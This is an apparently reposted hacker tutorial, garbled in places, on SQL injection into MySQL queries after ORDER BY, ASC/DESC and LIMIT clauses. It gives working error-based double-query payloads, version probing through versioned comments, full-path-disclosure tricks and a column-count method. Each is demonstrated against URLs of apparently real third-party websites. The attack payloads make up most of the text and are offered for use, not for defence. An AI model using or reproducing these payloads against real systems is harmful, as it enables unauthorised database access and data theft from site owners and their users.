Bypass 'encrect usage of UNION and ORDER'

Source: Internet
Author: User

This tut will give you instructions how to inject after order by/limit.

Like that

PHP Code: SELET * FROM page WHERE id = 1 order by id [here] ASC [here] LIMIT 10, 10 [here] here-injection point.
We cant use union after those clses, so we gonna play with the other things we can do.

After order by id [here]
Using double query.

If we have this site
Code: http://www.bkjia.com/include/products. php? Sb = idthe injection point is after order.

I know I can use union in another onjection point, I do it for the tut.
After order by its simple, the only things we cant use is-
Union, having, where, and some more things that dosent matter.
We can use 'and' for double query.
Code: http://www.teletec.com.pk/include/products.php? Sb = id and (select count (*) from products group by concat (version (), 0x27202020, floor (rand (0) * 2-1 ))) -- '5. 0.95-community'


(I used the table 'products' because I can see that this table exist from the error. if you cant see the table, use 'information _ schema. columns '.)

After desc/asc [here]
Using double query.

If we have this site
Code: http://www.teletec.com.pk/include/products.php? Sb = id desc 'the injection point is after desc.

After desc/asc its little more problem, because we cant use-
Union, having, where, and, or, xor, *,>, so we cant execute our query.
So we add a comma, and the double query after that.
Code: http://www.teletec.com.pk/include/products.php? Sb = id desc, (select count (*) from users group by concat (version (), 0x27202020, floor (rand (0) * 2-1 ))) '5. 0.95-community'


Note-if the injection point is like that-
PHP Code: SELECT * FROM page WHERE id = 1 order by [here] id just add '1' and inject like that first example.
Code: 1 and (select count (*) from products group by concat (version (), 0x27202020, floor (rand (0) * 2-1 )))--
After limit 10, 10 [here]
Using some tricks.

Like this site-
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 injetion point after limit clause.

When the injection point is after limit clause, we cant do anything, only those commands-
Offset, into, into outfile/dumpfile ,/*! */, For update, lock in share mode.
So we try to exploit what we can.
Toc-
Get the version
Full path disclosure
Find column count

Get the version (thanks to lolalu0)
We can use comments for getting the mysql version.
We can guess it, and if its true, the page will not load, just like blind, but different.
Code: http://www.bkjia.com/include/products. php? Rw = 10 /*! 50094aaaa */page dont load-version bigger then 5.00.94
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 /*! 50096aaaa */page load normally-version smaller than 5.00.96
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 /*! 50095aaaa */page dont load-version is 5.00.95.

FPD
For Full Path Disclosure, we can 0 or/**/the limit clause, and error with the full path will appear, even mysql_error is on.
For example
Code: http://www.teletec.com.pk/include/products.php? Rw = 0 final query-
PHP Code: select * from... limit 0, 0 and


We can also
Code: http://www.teletec.com.pk/include/products.php? Rw =/**/1 Warning: Division by zero in/home/teletec/public_html/include/products. php on line 164

Find the column count
Using.
Its not really will help, but its nice trick.
If we have this site-
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 injection point is after limit.
We can count the columns like that-
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 @

Error 1222.
Not 1 column.

Code: http://www.teletec.com.pk/include/products.php? Rw = 10 @,@

Error 1222.
Not 2 column.

And so on-
Code: http://www.teletec.com.pk/include/products.php? Rw = 10 @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@, @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@, @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@, @,@

Error 1172 "Result consisted of more than one row ".
60 columns.

Hope you learned something

Author: just fuck it!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.